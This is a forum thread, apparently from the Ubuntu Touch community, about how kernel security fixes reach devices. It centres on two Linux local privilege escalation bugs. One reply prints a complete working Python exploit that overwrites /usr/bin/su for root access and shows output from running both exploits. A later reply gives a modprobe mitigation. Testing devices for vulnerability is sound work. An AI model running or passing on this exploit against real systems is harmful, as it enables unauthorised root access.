    UT kernel security question

    • tidip

      Hello,

      hopefully I am in the right section... I am just wondering how kernel security issues are handled in UT. Let's take the last 2 as an example (dirty frag and copy fail). Is it the responsibility of the maintainer(s) of the device to push a new kernel, or of some other group? How do I get such updates?

      Thanks

      • Bolly @tidip

        @tidip If I'm not mistaken, it's not possible to exploit those vulnerabilities on Ubuntu Touch since there's only one user.

        15-25: BQ Aquaris E4.5 Ubuntu edition ☠️?
        23-25: BQ Aquaris E5 HD ☠️?
        16-Now (Daily use) : BQ Aquaris M10 FHD Betatester
        20-Now: PinePhone Braveheart & CE UBports

        (Family/Daily use)

        20-Now: Vollaphone Noble
        22-Now: Vollaphone22 Noble

        • gpatel-fr @tidip

          @tidip

          it all depends on the kernel, that is, on the specific port.

          Here is what the 2 exploits you are referring to give on my Fairphone 5 running UT 24.04-1.3:

          phablet@ubuntu-phablet:~$ python3 copyfail.py
          Traceback (most recent call last):
            File "/home/phablet/copyfail.py", line 9, in <module>
              while i<len(e):c(f,i,e[i:i+4]);i+=4
                             ^^^^^^^^^^^^^^^
            File "/home/phablet/copyfail.py", line 5, in c
              a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
                ^^^^^^^^^^^^^^^^
            File "/usr/lib/python3.12/socket.py", line 233, in __init__
              _socket.socket.__init__(self, family, type, proto, fileno)
          OSError: [Errno 97] Address family not supported by protocol
          phablet@ubuntu-phablet:~$ cd Downloads/
          phablet@ubuntu-phablet:~/Downloads$ gcc -O0 -Wall -o exp exp.c -lutil
          phablet@ubuntu-phablet:~/Downloads$ ./exp
          /usr/bin/su: 1: ELF: not found
          /usr/bin/su: 1: cannot open : No such file
          /usr/bin/su: 1: cannot open {�(��4[O+1� �z�~��]�5��m���l<����������E]�����E- ���Hp�: No such file
          /usr/bin/su: 4: F�1� ���*F�B1� ���.F�b1� ���2F��1� ���6F��1� ���:F��1� ���>F��1� ���BF�2� ���FF�2�: not found
          /usr/bin/su: 5: Syntax error: ")" unexpected
          phablet@ubuntu-phablet:~/Downloads$ 
          
          

          In short: no root shell, so not vulnerable, without any mitigation. Don't ask me why, I don't know.

          To anyone wanting to run this code: the dirtyfrag exploit can be had here

          The python code to test the copyfail vuln is here:

          #!/usr/bin/env python3
          import os as g,zlib,socket as s
          def d(x):return bytes.fromhex(x)
          def c(f,t,c):
           a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
           try:u.recv(8+t)
           except:0
          f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
          while i<len(e):c(f,i,e[i:i+4]);i+=4
          
          
          

          @bolly: getting root access from software running as phablet allows the code to install system services and remount the root r/w, and as such is preferably avoided.

          • idonthatevests @gpatel-fr

            @gpatel-fr
            The second one looks like it successfully wrote something to su and tried to run it, but the su contents were misunderstood by the OS.
            The mitigation should be the same as for desktop Linux: disabling the affected modules completely in the modprobe config:

            install esp4 /bin/false
            install esp6 /bin/false
            install rxrpc /bin/false
            install algif_aead /bin/false
            
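As an added example (not from the post above or from the UBports project), a POSIX shell check of whether that modprobe mitigation is in place for the four modules named there and whether any of them is currently loaded; the script name audit_mods.sh and the file paths it reads are assumptions.

```shell
#!/bin/sh
# Added example (not from the post): audit the modprobe "install <module> /bin/false"
# mitigation for the four modules named above, and report which are currently loaded.
# Paths are parameters so the check can also run against constructed files.

MODULES="esp4 esp6 rxrpc algif_aead"

# 0 if $1 is blocked by an "install $1 /bin/false" (or /bin/true) line in $2,
# where $2 is one modprobe config file or a directory of *.conf files.
mod_is_blocked() {
    mod="$1"; cfg="$2"
    if [ -d "$cfg" ]; then
        files=$(find "$cfg" -name '*.conf' 2>/dev/null)
    else
        files="$cfg"
    fi
    [ -n "$files" ] || return 1          # no config at all: not blocked
    # Commented-out lines ("# install ...") must not count, hence the anchored pattern.
    # $files is word-split on purpose (paths without spaces assumed).
    grep -Eqs "^[[:space:]]*install[[:space:]]+$mod[[:space:]]+/bin/(false|true)([[:space:]]|$)" $files
}

# 0 if $1 appears as a loaded module in $2 (a file in /proc/modules format).
mod_is_loaded() {
    grep -Eqs "^$1[[:space:]]" "$2"
}

# Print one line per module; return 0 only if every module is blocked and none is loaded.
audit_modules() {
    cfg="$1"; loaded="$2"; rc=0
    for m in $MODULES; do
        if mod_is_blocked "$m" "$cfg"; then b="blocked"; else b="NOT blocked"; rc=1; fi
        if mod_is_loaded "$m" "$loaded"; then l="LOADED"; rc=1; else l="not loaded"; fi
        printf '%-12s %-12s %s\n' "$m" "$b" "$l"
    done
    return $rc
}

# Usage: sh audit_mods.sh audit [modprobe_dir] [proc_modules]
case "${1:-}" in
    audit) audit_modules "${2:-/etc/modprobe.d}" "${3:-/proc/modules}" ;;
esac
```

The install lines only stop code that was built as a loadable module; if a port's kernel compiles any of these in (they then appear in /lib/modules/$(uname -r)/modules.builtin and never in /proc/modules), the modprobe block has no effect and the audit must be read against that list.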
            • tidip

              Thanks for your answers. I was just taking these 2 flaws as examples to understand the workflow in such cases. Still interesting to know that these 2 are not affecting us too much.

              So if I understood correctly, patching the kernel would be the responsibility of the port maintainer(s).

              • gpatel-fr @idonthatevests

                @idonthatevests said:

                but the su contents was misunderstood by OS

                Well, this misunderstanding would need explaining, but it could be the result of a security layer somewhere. I tested these 2 exploits on my workstation under Kubuntu 24.04 and they produced the expected result (root access).

                • gpatel-fr @tidip

                  @tidip said:

                  Still interesting to know that these 2 are not affecting us too much.

                  This is not what I wrote. You could replace 'are' by 'may'. It depends on the specific device. I provided the means of testing these exploits to allow people to test for themselves.
